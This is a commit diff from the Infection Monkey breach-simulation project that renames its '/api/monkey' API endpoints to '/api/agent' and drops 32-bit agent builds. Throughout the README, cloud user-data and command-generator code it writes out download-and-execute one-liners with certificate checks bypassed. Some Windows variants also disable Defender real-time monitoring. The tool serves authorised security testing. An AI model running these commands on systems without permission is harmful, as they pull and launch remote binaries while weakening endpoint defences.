forked from p34709852/monkey
Merge pull request #1893 from guardicore/1888-rename-monkey-endpoint
1888 rename monkey endpoint
This commit is contained in:
commit
587331dbdb
|
@ -30,6 +30,7 @@ Changelog](https://keepachangelog.com/en/1.0.0/).
|
|||
- The "/api/test/clear_caches" endpoint to "/api/test/clear-caches". #1888
|
||||
- The "/api/netmap/nodeStates" endpoint to "/api/netmap/node-states". #1888
|
||||
- All "/api/monkey_control" endpoints to "/api/monkey-control". #1888
|
||||
- All "/api/monkey" endpoints to "/api/agent". #1888
|
||||
|
||||
### Removed
|
||||
- VSFTPD exploiter. #1533
|
||||
|
|
|
@ -68,13 +68,13 @@ Example commands:
|
|||
```cmd
|
||||
[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy
|
||||
Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue
|
||||
Invoke-WebRequest -Uri 'https://10.0.0.251:5000/api/monkey/download/monkey-windows-64.exe' -OutFile 'C:\windows\temp\monkey-windows-64.exe' -UseBasicParsing
|
||||
Invoke-WebRequest -Uri 'https://10.0.0.251:5000/api/agent/download/windows' -OutFile 'C:\windows\temp\monkey-windows-64.exe' -UseBasicParsing
|
||||
C:\windows\temp\monkey-windows-64.exe m0nk3y -s 10.0.0.251:5000
|
||||
```
|
||||
|
||||
- Bash:
|
||||
```shell script
|
||||
wget --no-check-certificate -q https://10.0.0.251:5000/api/monkey/download/monkey-linux-64 -O ./monkey-linux-64 || curl https://10.0.0.251:5000/api/monkey/download/monkey-linux-64 -k -o monkey-linux-64
|
||||
wget --no-check-certificate -q https://10.0.0.251:5000/api/agent/download/linux -O ./monkey-linux-64 || curl https://10.0.0.251:5000/api/agent/download/linux -k -o monkey-linux-64
|
||||
chmod +x ./monkey-linux-64
|
||||
./monkey-linux-64 m0nk3y -s 10.0.0.251:5000
|
||||
```
|
||||
|
|
|
@ -47,37 +47,10 @@ Content-Transfer-Encoding: 7bit
|
|||
Content-Disposition: attachment; filename="userdata.txt"
|
||||
#!/bin/bash
|
||||
rm ./monkey-linux-64
|
||||
wget --no-check-certificate -q https://10.0.0.251:5000/api/monkey/download/monkey-linux-64 -O ./monkey-linux-64 || curl https://10.0.0.251:5000/api/monkey/download/monkey-linux-64 -k -o monkey-linux-64
|
||||
wget --no-check-certificate -q https://10.0.0.251:5000/api/agent/download/linux -O ./monkey-linux-64 || curl https://10.0.0.251:5000/api/agent/download/linux -k -o monkey-linux-64
|
||||
chmod +x ./monkey-linux-64
|
||||
./monkey-linux-64 m0nk3y -s 10.0.0.251:5000
|
||||
--//
|
||||
EOF
|
||||
|
||||
user_data_linux_32 = <<EOF
|
||||
Content-Type: multipart/mixed; boundary="//"
|
||||
MIME-Version: 1.0
|
||||
|
||||
--//
|
||||
Content-Type: text/cloud-config; charset="us-ascii"
|
||||
MIME-Version: 1.0
|
||||
Content-Transfer-Encoding: 7bit
|
||||
Content-Disposition: attachment; filename="cloud-config.txt"
|
||||
|
||||
#cloud-config
|
||||
cloud_final_modules:
|
||||
- [scripts-user, always]
|
||||
|
||||
--//
|
||||
Content-Type: text/x-shellscript; charset="us-ascii"
|
||||
MIME-Version: 1.0
|
||||
Content-Transfer-Encoding: 7bit
|
||||
Content-Disposition: attachment; filename="userdata.txt"
|
||||
#!/bin/bash
|
||||
rm ./monkey-linux-32
|
||||
wget --no-check-certificate -q https://10.0.0.251:5000/api/monkey/download/monkey-linux-32 -O ./monkey-linux-32 || curl https://10.0.0.251:5000/api/monkey/download/monkey-linux-32 -k -o monkey-linux-32
|
||||
chmod +x ./monkey-linux-32
|
||||
./monkey-linux-32 m0nk3y -s 10.0.0.251:5000
|
||||
--//
|
||||
EOF
|
||||
|
||||
user_data_windows_64 = <<EOF
|
||||
|
@ -95,31 +68,10 @@ add-type @"
|
|||
"@
|
||||
[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy
|
||||
Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue
|
||||
Invoke-WebRequest -Uri 'https://10.0.0.251:5000/api/monkey/download/monkey-windows-64.exe' -OutFile 'C:\windows\temp\monkey-windows-64.exe' -UseBasicParsing
|
||||
Invoke-WebRequest -Uri 'https://10.0.0.251:5000/api/agent/download/windows' -OutFile 'C:\windows\temp\monkey-windows-64.exe' -UseBasicParsing
|
||||
C:\windows\temp\monkey-windows-64.exe m0nk3y -s 10.0.0.251:5000
|
||||
</powershell>
|
||||
<persist>true</persist>
|
||||
EOF
|
||||
|
||||
user_data_windows_32 = <<EOF
|
||||
<powershell>
|
||||
add-type @"
|
||||
using System.Net;
|
||||
using System.Security.Cryptography.X509Certificates;
|
||||
public class TrustAllCertsPolicy : ICertificatePolicy {
|
||||
public bool CheckValidationResult(
|
||||
ServicePoint srvPoint, X509Certificate certificate,
|
||||
WebRequest request, int certificateProblem) {
|
||||
return true;
|
||||
}
|
||||
}
|
||||
"@
|
||||
[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy
|
||||
Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue
|
||||
Invoke-WebRequest -Uri 'https://10.0.0.251:5000/api/monkey/download/monkey-windows-32.exe' -OutFile 'C:\windows\temp\monkey-windows-32.exe' -UseBasicParsing
|
||||
C:\windows\temp\monkey-windows-32.exe m0nk3y -s 10.0.0.251:5000
|
||||
</powershell>
|
||||
<persist>true</persist>
|
||||
EOF
|
||||
}
|
||||
|
||||
|
|
|
@ -50,7 +50,7 @@ class ControlClient(object):
|
|||
monkey["tunnel"] = ControlClient.proxies.get("https")
|
||||
|
||||
requests.post( # noqa: DUO123
|
||||
"https://%s/api/monkey" % (WormConfiguration.current_server,),
|
||||
"https://%s/api/agent" % (WormConfiguration.current_server,),
|
||||
data=json.dumps(monkey),
|
||||
headers={"content-type": "application/json"},
|
||||
verify=False,
|
||||
|
@ -173,7 +173,7 @@ class ControlClient(object):
|
|||
return
|
||||
try:
|
||||
reply = requests.get( # noqa: DUO123
|
||||
"https://%s/api/monkey/%s/legacy" % (WormConfiguration.current_server, GUID),
|
||||
"https://%s/api/agent/%s/legacy" % (WormConfiguration.current_server, GUID),
|
||||
verify=False,
|
||||
proxies=ControlClient.proxies,
|
||||
timeout=MEDIUM_REQUEST_TIMEOUT,
|
||||
|
@ -210,7 +210,7 @@ class ControlClient(object):
|
|||
return
|
||||
try:
|
||||
requests.patch( # noqa: DUO123
|
||||
"https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID),
|
||||
"https://%s/api/agent/%s" % (WormConfiguration.current_server, GUID),
|
||||
data=json.dumps({"config_error": True}),
|
||||
headers={"content-type": "application/json"},
|
||||
verify=False,
|
||||
|
|
|
@ -33,7 +33,7 @@ class CachingAgentRepository(IAgentRepository):
|
|||
@lru_cache(maxsize=None)
|
||||
def _download_binary_from_island(self, os: str) -> bytes:
|
||||
response = requests.get( # noqa: DUO123
|
||||
f"{self._island_url}/api/monkey/download/{os}",
|
||||
f"{self._island_url}/api/agent/download/{os}",
|
||||
verify=False,
|
||||
proxies=self._proxies,
|
||||
timeout=MEDIUM_REQUEST_TIMEOUT,
|
||||
|
|
|
@ -50,7 +50,7 @@ class ControlChannel(IControlChannel):
|
|||
def get_config(self) -> dict:
|
||||
try:
|
||||
response = requests.get( # noqa: DUO123
|
||||
"https://%s/api/monkey/%s" % (WormConfiguration.current_server, self._agent_id),
|
||||
"https://%s/api/agent/%s" % (WormConfiguration.current_server, self._agent_id),
|
||||
verify=False,
|
||||
proxies=ControlClient.proxies,
|
||||
timeout=SHORT_REQUEST_TIMEOUT,
|
||||
|
|
|
@ -117,9 +117,9 @@ def init_api_resources(api):
|
|||
api.add_resource(Authenticate, "/api/auth")
|
||||
api.add_resource(
|
||||
Monkey,
|
||||
"/api/monkey",
|
||||
"/api/monkey/<string:guid>",
|
||||
"/api/monkey/<string:guid>/<string:config_format>",
|
||||
"/api/agent",
|
||||
"/api/agent/<string:guid>",
|
||||
"/api/agent/<string:guid>/<string:config_format>",
|
||||
)
|
||||
api.add_resource(LocalRun, "/api/local-monkey")
|
||||
api.add_resource(Telemetry, "/api/telemetry", "/api/telemetry/<string:monkey_guid>")
|
||||
|
@ -130,7 +130,7 @@ def init_api_resources(api):
|
|||
api.add_resource(ConfigurationImport, "/api/configuration/import")
|
||||
api.add_resource(
|
||||
MonkeyDownload,
|
||||
"/api/monkey/download/<string:host_os>",
|
||||
"/api/agent/download/<string:host_os>",
|
||||
)
|
||||
api.add_resource(NetMap, "/api/netmap")
|
||||
api.add_resource(Edge, "/api/netmap/edge")
|
||||
|
|
|
@ -26,7 +26,7 @@ class Monkey(flask_restful.Resource):
|
|||
if guid:
|
||||
monkey_json = mongo.db.monkey.find_one_or_404({"guid": guid})
|
||||
# TODO: When the "legacy" format is no longer needed, update this logic and remove the
|
||||
# "/api/monkey/<string:guid>/<string:config_format>" route. Also considering not
|
||||
# "/api/agent/<string:guid>/<string:config_format>" route. Also considering not
|
||||
# flattening the config in the first place.
|
||||
if config_format == "legacy":
|
||||
ConfigService.decrypt_flat_config(monkey_json["config"])
|
||||
|
|
|
@ -41,14 +41,12 @@ class RemoteRunAwsService:
|
|||
:param island_ip: IP of island the monkey will communicate with
|
||||
:return: Dictionary with instance ids as keys, and True/False as values if succeeded or not
|
||||
"""
|
||||
instances_bitness = RemoteRunAwsService.get_bitness(instances)
|
||||
return CmdRunner.run_multiple_commands(
|
||||
instances,
|
||||
lambda instance: RemoteRunAwsService.run_aws_monkey_cmd_async(
|
||||
lambda instance: RemoteRunAwsService._run_aws_monkey_cmd_async(
|
||||
instance["instance_id"],
|
||||
RemoteRunAwsService._is_linux(instance["os"]),
|
||||
island_ip,
|
||||
instances_bitness[instance["instance_id"]],
|
||||
),
|
||||
lambda _, result: result.is_success,
|
||||
)
|
||||
|
@ -65,60 +63,19 @@ class RemoteRunAwsService:
|
|||
AwsService.set_region(RemoteRunAwsService.aws_instance.region)
|
||||
|
||||
@staticmethod
|
||||
def get_bitness(instances):
|
||||
"""
|
||||
For all given instances, checks whether they're 32 or 64 bit.
|
||||
:param instances: List of instances to check
|
||||
:return: Dictionary with instance ids as keys, and True/False as values. True if 64bit,
|
||||
False otherwise
|
||||
"""
|
||||
return CmdRunner.run_multiple_commands(
|
||||
instances,
|
||||
lambda instance: RemoteRunAwsService.run_aws_bitness_cmd_async(
|
||||
instance["instance_id"], RemoteRunAwsService._is_linux(instance["os"])
|
||||
),
|
||||
lambda instance, result: RemoteRunAwsService._get_bitness_by_result(
|
||||
RemoteRunAwsService._is_linux(instance["os"]), result
|
||||
),
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _get_bitness_by_result(is_linux, result):
|
||||
if not result.is_success:
|
||||
return None
|
||||
elif is_linux:
|
||||
return result.stdout.find("i686") == -1 # i686 means 32bit
|
||||
else:
|
||||
return (
|
||||
result.stdout.lower().find("programfiles(x86)") != -1
|
||||
) # if not found it means 32bit
|
||||
|
||||
@staticmethod
|
||||
def run_aws_bitness_cmd_async(instance_id, is_linux):
|
||||
"""
|
||||
Runs an AWS command to check bitness
|
||||
:param instance_id: Instance ID of target
|
||||
:param is_linux: Whether target is linux
|
||||
:return: Cmd
|
||||
"""
|
||||
cmd_text = "uname -m" if is_linux else "Get-ChildItem Env:"
|
||||
return RemoteRunAwsService.run_aws_cmd_async(instance_id, is_linux, cmd_text)
|
||||
|
||||
@staticmethod
|
||||
def run_aws_monkey_cmd_async(instance_id, is_linux, island_ip, is_64bit):
|
||||
def _run_aws_monkey_cmd_async(instance_id, is_linux, island_ip):
|
||||
"""
|
||||
Runs a monkey remotely using AWS
|
||||
:param instance_id: Instance ID of target
|
||||
:param is_linux: Whether target is linux
|
||||
:param island_ip: IP of the island which the instance will try to connect to
|
||||
:param is_64bit: Whether the instance is 64bit
|
||||
:return: Cmd
|
||||
"""
|
||||
cmd_text = RemoteRunAwsService._get_run_monkey_cmd_line(is_linux, is_64bit, island_ip)
|
||||
return RemoteRunAwsService.run_aws_cmd_async(instance_id, is_linux, cmd_text)
|
||||
cmd_text = RemoteRunAwsService._get_run_monkey_cmd_line(is_linux, island_ip)
|
||||
return RemoteRunAwsService._run_aws_cmd_async(instance_id, is_linux, cmd_text)
|
||||
|
||||
@staticmethod
|
||||
def run_aws_cmd_async(instance_id, is_linux, cmd_line):
|
||||
def _run_aws_cmd_async(instance_id, is_linux, cmd_line):
|
||||
cmd_runner = AwsCmdRunner(is_linux, instance_id)
|
||||
return Cmd(cmd_runner, cmd_runner.run_command_async(cmd_line))
|
||||
|
||||
|
@ -127,39 +84,35 @@ class RemoteRunAwsService:
|
|||
return "linux" == os
|
||||
|
||||
@staticmethod
|
||||
def _get_run_monkey_cmd_linux_line(bit_text, island_ip):
|
||||
def _get_run_monkey_cmd_linux_line(island_ip):
|
||||
return (
|
||||
r"wget --no-check-certificate https://"
|
||||
+ island_ip
|
||||
+ r":5000/api/monkey/download/monkey-linux-"
|
||||
+ bit_text
|
||||
+ r"; chmod +x monkey-linux-"
|
||||
+ bit_text
|
||||
+ r"; ./monkey-linux-"
|
||||
+ bit_text
|
||||
+ r":5000/api/agent/download/linux "
|
||||
+ r"-O monkey-linux-64"
|
||||
+ r"; chmod +x monkey-linux-64"
|
||||
+ r"; ./monkey-linux-64"
|
||||
+ r" m0nk3y -s "
|
||||
+ island_ip
|
||||
+ r":5000"
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _get_run_monkey_cmd_windows_line(bit_text, island_ip):
|
||||
def _get_run_monkey_cmd_windows_line(island_ip):
|
||||
return (
|
||||
r"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {"
|
||||
r"$true}; (New-Object System.Net.WebClient).DownloadFile('https://"
|
||||
+ island_ip
|
||||
+ r":5000/api/monkey/download/monkey-windows-"
|
||||
+ bit_text
|
||||
+ r".exe','.\\monkey.exe'); "
|
||||
+ r":5000/api/agent/download/windows'"
|
||||
+ r"'.\\monkey.exe'); "
|
||||
r";Start-Process -FilePath '.\\monkey.exe' "
|
||||
r"-ArgumentList 'm0nk3y -s " + island_ip + r":5000'; "
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _get_run_monkey_cmd_line(is_linux, is_64bit, island_ip):
|
||||
bit_text = "64" if is_64bit else "32"
|
||||
def _get_run_monkey_cmd_line(is_linux, island_ip):
|
||||
return (
|
||||
RemoteRunAwsService._get_run_monkey_cmd_linux_line(bit_text, island_ip)
|
||||
RemoteRunAwsService._get_run_monkey_cmd_linux_line(island_ip)
|
||||
if is_linux
|
||||
else RemoteRunAwsService._get_run_monkey_cmd_windows_line(bit_text, island_ip)
|
||||
else RemoteRunAwsService._get_run_monkey_cmd_windows_line(island_ip)
|
||||
)
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
export default function generateLocalLinuxCurl(ip, username) {
|
||||
let command = `curl https://${ip}:5000/api/monkey/download/linux -k `
|
||||
let command = `curl https://${ip}:5000/api/agent/download/linux -k `
|
||||
+ `-o monkey-linux-64; `
|
||||
+ `chmod +x monkey-linux-64; `
|
||||
+ `./monkey-linux-64 m0nk3y -s ${ip}:5000;`;
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
export default function generateLocalLinuxWget(ip, username) {
|
||||
let command = `wget --no-check-certificate https://${ip}:5000/api/monkey/download/`
|
||||
let command = `wget --no-check-certificate https://${ip}:5000/api/agent/download/`
|
||||
+ `linux -O ./monkey-linux-64; `
|
||||
+ `chmod +x monkey-linux-64; `
|
||||
+ `./monkey-linux-64 m0nk3y -s ${ip}:5000`;
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
function getAgentDownloadCommand(ip) {
|
||||
return `$execCmd = @"\r\n`
|
||||
+ `[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {\`$true};`
|
||||
+ `(New-Object System.Net.WebClient).DownloadFile('https://${ip}:5000/api/monkey/download/windows',`
|
||||
+ `(New-Object System.Net.WebClient).DownloadFile('https://${ip}:5000/api/agent/download/windows',`
|
||||
+ `"""$env:TEMP\\monkey.exe""");Start-Process -FilePath '$env:TEMP\\monkey.exe' -ArgumentList 'm0nk3y -s ${ip}:5000';`
|
||||
+ `\r\n"@; \r\n`
|
||||
+ `Start-Process -FilePath powershell.exe -ArgumentList $execCmd`;
|
||||
|
|
Loading…
Reference in New Issue